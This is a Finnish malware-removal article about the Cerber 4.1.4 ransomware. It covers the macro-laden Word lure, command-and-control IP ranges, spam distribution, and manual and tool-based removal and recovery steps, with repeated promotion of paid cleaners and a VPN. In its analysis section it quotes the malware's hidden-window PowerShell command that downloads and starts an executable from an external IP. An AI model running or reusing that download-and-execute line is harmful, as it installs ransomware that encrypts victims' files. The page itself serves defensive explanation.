Vakavuus luokka:  
  (99/100)

Poista Cerber 4.1.4 virus (Viruksen Poisto-ohjeet)

kirjoittanut Julie Splinters - - | Tyyppi: Lunnasohjelma

Terrorisointi jatkuu – Cerber 4.1.4 on julkaistu

Cerber 4.1.4 uusi jatko-osa Cerber verkko kampanjaan. Vaikuttaa siltä, että vain viikko on mennyt kun hakkerit iskivät virtuaaliseen yhteisöön Cerber 4.1.0 ja Cerber 4.1.1 viruksilla. Vaikka he pitivät sitä heikkona hyökkäyksenä ja, sen seurauksena, vahvistivat sitä muilla saman sarjan lunnasohjelmilla. Se jatkaa trendiä lisätä tiedostoihin pääte satunnaisilla merkeillä. Uusin versio varastaa joitain vihjeitä Locky lunnasohjelmalta sillä se on muuttanut sen aktivointia tämä uhan kaltaiseksi. Erityisesti Cerber 4.1.4 käyttää Word dokumenttia ja pyytää sallimaan makro asetukset ladatakseen sen päätiedoston. Tämä tekniikka, jota Locky käyttää, on jo ollut IT-asiantuntijoiden keskusteluissa. Käyttäjät jotka siis seuraavat IT-maailman trendejä, voivat välttää tämän verkkouhan. Jos sinulla on tämä haittaohjelma niin ei ole syytä paniikkiin. Ensimmäiseksi, sinun pitää poistaa Cerber 4.1.4 laitteeltasi. Käytä ReimageIntego ohjelmaa prosessin nopeuttamiseksi.

Tämän lunnasohjelman uusin version jatkaa tuhojaan maailmanlaajuisesti. Aivan kuten 4.1.0 ja 4.1.1 versiot, se alkoi käyttämään tekniikkaa jossa se käyttää IP osoitteita lähettääkseen UDP paketteja sen Command & Control palvelimille. Tällä hetkellä, viimeisin versio käyttää kolmea IP osoitetta, 5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22, voidakseen siirtää teknisiä tietoja palvelimille. Tämä ominaisuus antaa hakkereille mahdollisuuden kerätä tärkeää tietoa uhriensa laitteista ja käyttöjärjestelmistä. On sanomattakin selvää, että tällaiset tiedot inspiroivat verkkorikollisia parantamaan hakkerointi strategioitaan.

Cerber 4.1.4 rampages ruthlessly

Tämän uuden version pääominaisuus on tapa jolla Cerber 4.1.4 haittaohjelma laukaisee tuhoisan hyökkäyksensä. Tämän lunnasohjelman eri versiot käyttivät jo spämmi viestejä ja tekaistuja laskuja hyökätäkseen käyttäjien järjestelmään, tämä versio on siirtynyt makrojen sallimista kohti. Kun uhri avaa saadun .doc tiedoston niin hän näkee MS Word dokumentin. Siinä on rivi satunnaisia merkkejä ja koodeja. Onneksi viimeisin Word versio poistaa makrot käytöstä oletuksena. Siksi sinua pyydetään ottamaan ne käyttöön. Kun nämä asetukset on muokattu niin Cerber 4.1.4 lunnasohjelma käynnistää PowerShellin. Sekunneissa, base64 tyyppinen ketju jatkaa sen aktivointiin. Myöhemmin se päättyy tähän ketjuun.

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(’http://94.102.58.30/~trevor/winx64.exe’,”$env:APPDATA\winx64.exe”);Start-Process (”$env:APPDATA\winx64.exe”)

Kuten voi huomata, tämä komento suoritettiin lataamaan ja käynnistämään sen pääelementti – win64.exe. Jos sinulla sattuu olemaan 32-bit Windows järjestelmä niin vastaava tiedosto voi olla win32.exe. Nyt viruksen pitää asettaa tiedosto %AppData% kansioon jotta se on kaikkein tehokkain. Kuten tavallista, kun virus salaa tiedostojasi niin voit huomata Readme.hta tiedoston työpöydällä. Kun salaus on valmis niin taustakuvaksesi vaihdetaan lunnasviesti, joka kertoo Cerber 4.1.4 kaappauksesta. Käyttämällä MachineGuid arvoa, joka on HKLM\Software\Microsoft\Cryptography kansiossa uhrin tietokoneella, se luo satunnaisen päätteen. Älä hukkaa aikaa vaan poista Cerber 4.1.4 heti.

Levitystavat

Tämä virus suosii toimivaksi todettua levitystapaa, spämmi viestit. Vaikka käyttäjiä varoitetaan jatkuvasti, että he eivät avaisi varomattomasti laskuja, virallisia kaavakkeita tai poliisi-ilmoituksia tuntemattomilta lähettäjiltä, silti saastuneiden käyttäjien määrä pysyy korkeana. Verkkorikollisilla on harjaantuneet tekniikat suostuttelemaan kohteita heidän tottelemiseen. Jos näet viesti FBI toimistolta tai verovirastolta niin varmista lähettäjä ennen kuin avaat mitään liitteitä. Sinun kannattaa etsiä kirjoitus- ja kielioppivirheitä. Kunnollisen logon tai edustajan tietojen puuttuminen voi myös varoittaa siitä sähköpostista.

Onko mahdollista poistaa tämä virus kokonaan?

Mitä tulee Cerber 4.1.4 poistoon niin me suosittelemme asentamaan luotettavan turvallisuusohjelman, päivittää se asennuksen jälkeen ja suorittaa tarkistus. Haittaohjelman poistajat, kuten ReimageIntego tai Malwarebytes, poistavat yleensä Cerber 4.1.4 viruksen muutamassa minuutissa. Jos kuitenkin toivot niiden poistavan salauksen niin voit pettyä. Löytyy muita tapoja tehdä se, tehokkain tapa on kuitenkin palauttaa tiedostot varmuuskopioista tai alkuperäisellä salauksen poistajalla. Tähän liittyen, jatka lukemista ja tutustu meidän tiedostojen palautuksen suosituksiin. Jos virus lukitsi näyttösi tai et voi käyttää järjestelmää kunnollaa niin tässä ohjeita hallinnan palauttamiseen.

Tarjous
tee se nyt!
Lataa
Reimage tyytyväisyys
Taattu
Lataa
Intego tyytyväisyys
Taattu
Yhteensopiva Microsoft Windows käyttöjärjestelmän kanssa Supported versions Yhteensopiva OS X käyttöjärjestelmän kanssa Supported versions
Mitä tehdä jos epäonnistun
Jos et onnistunut poistamaan viruksen vahinkoja Reimage Intego, submit a question meidän tukitiimille ja anna kaikki mahdolliset tiedot.
Reimage Intego ohjelmalla on ilmainen rajoitettu skanneri. Reimage Intego tarjoaa tarkemman tarkistuksen, kun ostat sen täyden version. Kun ilmainen skanneri tunnistaa ongelmat, voit korjata ne ilmaisilla manuaalisilla ohjeilla tai voit päättää ostaa koko version, jotta voit korjata ne automaattisesti.
Vaihtoehtoiset Ohjelmat
Eri ohjelmilla on erilaisia tarkoituksia. Jos et onnistunut korjaamaan saastuneita tiedostoja Reimage ohjelmalla, niin kokeile SpyHunter 5 ohjelmaa.
Vaihtoehtoiset Ohjelmat
Eri ohjelmilla on erilaisia tarkoituksia. Jos et onnistunut korjaamaan saastuneita tiedostoja Intego ohjelmalla, niin kokeile Combo Cleaner ohjelmaa.

Manuaalinen Cerber 4.1.4 viruksen Poisto-ohje:

Poista Cerber 4.1.4 käyttäen Safe Mode with Networking

 • Askel 1: Käynnistä tietokoneesi uudelleen Safe Mode with Networking

  Windows 7 / Vista / XP
  1. Klikkaa Start Shutdown Restart OK.
  2. Kun tietokoneesi aktivoituu niin ala painamaan F8 toistuvasti kunnes näet Advanced Boot Options ikkunan.
  3. Valitse Safe Mode with Networking listalta Valitse 'Safe Mode with Networking'

  Windows 10 / Windows 8
  1. Paina Power painiketta Windows kirjautumisruudussa. Nyt paina ja pidä Shift mikä on näppäimistössäsi ja klikkaa Restart.
  2. Valitse sitten Troubleshoot Advanced options Startup Settings ja paina lopuksi Restart
  3. Kun tietokoneesi aktivoituu, valitse Enable Safe Mode with Networking, Startup Settings ikkunassa. Valitse 'Enable Safe Mode with Networking'
 • Askel 2: Poisto Cerber 4.1.4

  Kirjaudu saastuneelle tilillesi ja käynistä selain. Lataa ReimageIntego tai jokin muu haittaohjelman poistaja. Päivitä se ja suorita järjestelmän täysi tarkistus ja poista lunnasohjelmalle kuuluvat tiedostot ja suorita Cerber 4.1.4 poisto loppuun.

Jos lunnasohjelmasi estää Safe Mode with Networking toiminnan niin koeta seuraavaa tapaa.

Poista Cerber 4.1.4 käyttäen System Restore

 • Askel 1: Käynnistä tietokoneesi uudelleen Safe Mode with Command Prompt

  Windows 7 / Vista / XP
  1. Klikkaa Start Shutdown Restart OK.
  2. Kun tietokoneesi aktivoituu niin ala painamaan F8 toistuvasti kunnes näet Advanced Boot Options ikkunan.
  3. Valitse Command Prompt listalta Valitse 'Safe Mode with Command Prompt'

  Windows 10 / Windows 8
  1. Paina Power painiketta Windows kirjautumisruudussa. Nyt paina ja pidä Shift mikä on näppäimistössäsi ja klikkaa Restart.
  2. Valitse sitten Troubleshoot Advanced options Startup Settings ja paina lopuksi Restart
  3. Kun tietokoneesi aktivoituu, valitse Enable Safe Mode with Command Prompt, Startup Settings ikkunassa. Valitse 'Enable Safe Mode with Command Prompt'
 • Askel 2: Palauta järjestelmän tiedostot ja asetukset
  1. Kun Command Prompt ikkuna ilmaantuu, kirjoita cd restore ja klikkaa Enter. Kirjoita 'cd restore' ilman lainausmerkkejä ja paina 'Enter'
  2. Kirjoita sitten rstrui.exe ja paina Enter uudelleen.. Kirjoita 'rstrui.exe' ilman lainausmerkkejä ja paina 'Enter'
  3. Kun uusi ikkuna avautuu, klikkaa Next ja valitse haluamasi palautuspiste joka on ennen Cerber 4.1.4 pääsyä koneelle. Klikkaa sen jälkeen Next. Kun 'System Restore' ikkuna ilmaantuu, valitse 'Next' Valitse palautuspiste ja klikkaa 'Next'
  4. Klikkaa nyt Yes aloittaaksesi järjestelmän palautuksen Klikkaa 'Yes' ja aloita järjestelmän palautus
  Kun olet palauttanut järjestelmäsi aikaisempaan päivämäärään, lataa ja tarkista tietokoneesi ReimageIntego ohjelmalla ja varmista, että Cerber 4.1.4 on poistettu onnistuneesti

Bonus: Palauta tiedostosi

Ohjeiden jotka ovat yllä, pitäisi auttaa sinua poistamaan Cerber 4.1.4 tietokoneeltasi. Salattujen tiedostojen palauttamiseksi, me suosittelemme käyttämään yksityiskohtaisia ohjeita jotka virukset.fi turvallisuusasiantuntijat ovat luoneet

Jos tiedostosi ovat joutuneet Cerber 4.1.4 salaamaksi niin voit käyttää useita tapoja niiden palauttamiseksi

Kuinka tehokas on Data Recovery Pro?

Tämä sovellus voi olla ainoa toivosi edes osittaiseen tiedostojen palautukseen, kunnes virustutkijat julkaisevat salauksen poistotyökalun. Se on myös kätevä sovellus etsimään kadonneita tai korjaamaan vahingoittuneita tiedostoja.

 • Lataa Data Recovery Pro;
 • Seuraa askeleita Data Recovery Asetuksissa ja asenna ohjelma tietokoneellesi
 • Käynnistä se ja tarkista tietokoneesi tiedostojen varalta jotka Cerber 4.1.4 lunnasohjelma on salannut
 • Palaute ne

Onko Windows Previous Version toiminto vaihtoehto?

Vaikka tämä lunnasohjelma on tuhoisa niin sinulla voi olla toiveita palauttaa joitain tiedostojasi seuraavien askeleiden avulla. Ota huomioon, että Järjestelmä Palautus ominaisuus on oltava käytössä ennen viruksen tuloa koneelle.

 • Etsi salattu tiedosto joka sinun pitää palauttaa ja klikkaa sitä hiiren oikealla painikkeella
 • Valitse “Properties” ja mene “Previous versions” välilehteen;
 • Tarkista täällä kaikki tiedostosta saatavilla olevat kopiot kansiossa “Folder versions”. Sinun pitää valita versio jonka haluat palauttaa ja klikata “Restore”.

Lopuksi, sinun kannattaa aina ajatella suojautumista krypto-lunnasohjelmia vastaan. Voidaksesi suojella tietokonettasi Cerber 4.1.4 ja muita lunnasohjelmia vastaan, käytä maineikasta haittaohjelman poistajaa, kuten ReimageIntego, SpyHunter 5Combo Cleaner tai Malwarebytes.

Älä anna hallituksen vakoilla sinua

Hallituksella on useita ongelmia, mitä tulee käyttäjien tietojen seuraamiseen ja asukkaiden vakoiluun, joten sinun kannattaa ottaa tämä huomioon ja oppia lisää hämärien tietojen keräystavoista. Vältä ei-toivottua hallituksen seurantaa tai vakoilua ja ole täysin nimetön internetissä. 

Voit valita eri sijainnin, kun menet verkkoon ja käyt käsiksi materiaalin, jota haluat ilman sisältörajoituksia. Voit helposti nauttia riskittömästä internetyhteydestä pelkäämättä hakkerointia, kun käytät Private Internet Access VPN palvelua.

Hallitse tietoja joihin hallitus tai muu toivomaton osapuoli voi päästä käsiksi ja selata nettiä ilman vakoilua. Vaikka et ota osaa laittomiin toimiin tai luotat valitsemiisi palveluihin, alustoihin, epäilet omaa turvallisuuttasi ja teet varotoimia käyttämällä VPN palvelua.

Kirjoittajasta
Julie Splinters
Julie Splinters - Haittaohjelmien poiston asiantuntija

Jos tämä ilmainen poisto-ohje auttoi sinua ja olet tyytyväinen palveluumme, ole hyvä ja harkitse lahjoituksen tekemistä jotta voimme pitää tämän palvelun elossa. Jopa kaikkein pienin summa otetaan kiitollisuudella vastaan

Ota yhteyttä Julie Splinters
Tietoa yrityksestä Esolutions

Poisto-ohjeet muilla kielillä